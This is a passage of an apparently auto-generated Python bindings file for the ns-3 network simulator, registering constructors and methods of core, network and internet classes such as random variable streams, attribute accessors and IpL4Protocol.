is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TriangularRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::TriangularRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable::TriangularRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue(double mean, double min, double max) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'min'), param('double', 'max')])
## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger(uint32_t mean, uint32_t min, uint32_t max) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')])
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3UniformRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::UniformRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable::UniformRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue(double min, double max) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'min'), param('double', 'max')])
## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger(uint32_t min, uint32_t max) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'min'), param('uint32_t', 'max')])
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3WeibullRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::WeibullRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable::WeibullRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetScale() const [member function]
cls.add_method('GetScale',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetShape() const [member function]
cls.add_method('GetShape',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue(double scale, double shape, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'scale'), param('double', 'shape'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger(uint32_t scale, uint32_t shape, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ZetaRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZetaRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable::ZetaRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue(double alpha) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger(uint32_t alpha) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'alpha')])
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ZipfRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZipfRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function]
cls.add_method('GetValue',
'double',
[param('uint32_t', 'n'), param('double', 'alpha')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'n'), param('uint32_t', 'alpha')])
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3ConstantRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function]
cls.add_method('GetConstant',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'constant')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'constant')])
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3DeterministicRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function]
cls.add_method('SetValueArray',
'void',
[param('double *', 'values'), param('uint64_t', 'length')])
## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3EmpiricalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double arg0, double arg1, double arg2, double arg3, double arg4) [member function]
cls.add_method('Interpolate',
'double',
[param('double', 'arg0'), param('double', 'arg1'), param('double', 'arg2'), param('double', 'arg3'), param('double', 'arg4')],
visibility='private', is_virtual=True)
## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function]
cls.add_method('Validate',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ErlangRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function]
cls.add_method('GetK',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function]
cls.add_method('GetValue',
'double',
[param('uint32_t', 'k'), param('double', 'lambda')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'k'), param('uint32_t', 'lambda')])
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3EventImpl_methods(root_module, cls):
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
cls.add_constructor([])
## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[])
## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
cls.add_method('IsCancelled',
'bool',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
cls.add_method('Notify',
'void',
[],
is_pure_virtual=True, visibility='protected', is_virtual=True)
return
def register_Ns3ExponentialRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3GammaRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function]
cls.add_method('GetBeta',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')])
## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'alpha'), param('uint32_t', 'beta')])
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3IpL4Protocol_methods(root_module, cls):
## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::IpL4Protocol() [constructor]
cls.add_constructor([])
## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::IpL4Protocol(ns3::IpL4Protocol const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IpL4Protocol const &', 'arg0')])
## ip-l4-protocol.h (module 'internet'): ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv4Address,ns3::Ipv4Address,unsigned char,ns3::Ptr<ns3::Ipv4Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::IpL4Protocol::GetDownTarget() const [member function]
cls.add_method('GetDownTarget',
'ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ip-l4-protocol.h (module 'internet'): ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv6Address,ns3::Ipv6Address,unsigned char,ns3::Ptr<ns3::Ipv6Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::IpL4Protocol::GetDownTarget6() const [member function]
cls.add_method('GetDownTarget6',
'ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv6Address, ns3::Ipv6Address, unsigned char, ns3::Ptr< ns3::Ipv6Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ip-l4-protocol.h (module 'internet'): int ns3::IpL4Protocol::GetProtocolNumber() const [member function]
cls.add_method('GetProtocolNumber',
'int',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ip-l4-protocol.h (module 'internet'): static ns3::TypeId ns3::IpL4Protocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::RxStatus ns3::IpL4Protocol::Receive(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::Ipv4Interface> incomingInterface) [member function]
cls.add_method('Receive',
'ns3::IpL4Protocol::RxStatus',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::Ipv4Interface >', 'incomingInterface')],
is_pure_virtual=True, is_virtual=True)
